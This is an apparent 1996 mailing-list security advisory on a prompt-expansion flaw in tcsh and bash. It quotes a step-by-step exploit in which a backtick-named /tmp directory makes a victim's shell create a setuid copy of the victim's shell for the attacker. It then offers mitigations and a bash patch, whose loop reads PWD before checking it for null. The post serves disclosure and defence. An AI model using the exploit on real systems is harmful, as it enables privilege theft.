Vulnerability in expansion of PS1 in bash & tcsh

BETHERY Olivier (bethery@info.enserb.u-bordeaux.fr)
Thu, 19 Sep 1996 20:52:26 +0200

> test (butafuco@MC.NET)
> Fri, 13 Sep 1996 09:03:00 -0500
>
> A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
> out with BSDI anyway.) that allows the execution of arbitrary commands
> when changing into directories that are enclosed with back tic's.  The
> problem might also prove to be quite bad to tcsh scripts that find
> themselves changing into directories on the fly.
>
> Here is probably one of the dumbest methods possible that could be used to
> exploit this weakness.
>
> ----------------------------Cut to Bad guy--------------------------------
>
> jim% whoami
> Evol bad guy
> jim% mkdir /tmp/\`source\ .WaReZ\`
> jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
> jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
> jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
> jim% chmod +x /tmp/*W*/.WaReZ
>
> ---------------------------Cut to unsuspecting foo------------------------
>
> jim% whoami
> Unsuspecting foo
> jim% echo $SHELL
> /bin/tcsh
> jim% I just like to check that sometimes.
> jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
> jim% cd /tmp
> jim% ls
>
> `source .WaReZ`
>
> jim% OH BOY!!! the jack pot!
> jim% cd *WaReZ*
> jim% ls
>
> jim% oh, oh well maybe I'll check later...
> jim% cd $HOME
>
> ----------------------------Cut to More Bad guy--------------------------
>
> jim% ls -a /tmp/*W*/
>
> .
> ..
> .24753
>
> jim% /tmp/*W*/.24753
> $whoami
> unsuspecting foo
> $ hah.
> ---------------------------End Unix Parable-------------------------------

The antiquotes launch the expansion procedure so the expression
between quote is evaluated. This expansion is running when
PS1 variable need to be evaluate, with a cd command for example.
So if the string between quotes is an command line, this line is
executed
with the UID of the user who is doing the cd command.


A first fix for bash ( not tested with tcsh ):
Do not use PS1 and do not include . in your path

Second avaible fix for bash ( not tested with tcsh ):
( First Release, can be improve )

*** bash-1.14.7/parse.y Mon Aug 26 17:15:55 1996
--- bugfixed-bash/bash-1.14.7/parse.y   Thu Sep 19 16:20:58 1996
***************
*** 2719,2727 ****
  #define EFFICIENT
  #ifdef EFFICIENT
                char *polite_directory_format (),
t_string[MAXPATHLEN];
!
                temp = get_string_value ("PWD");
!
                if (!temp)
                  getwd (t_string);
                else
--- 2719,2733 ----
  #define EFFICIENT
  #ifdef EFFICIENT
                char *polite_directory_format (),
t_string[MAXPATHLEN];
!               char *mutmp;
                temp = get_string_value ("PWD");
!       /* BUGFIX -mu */
!               mutmp=temp;
!               while (*mutmp != '\0') {
!                 if (*mutmp == '`')
!                   *mutmp='%';
!                 mutmp++;
!               }
                if (!temp)
                  getwd (t_string);
                else

_______________
BETHERY Olivier
email : bethery@info.enserb.u-bordeaux.fr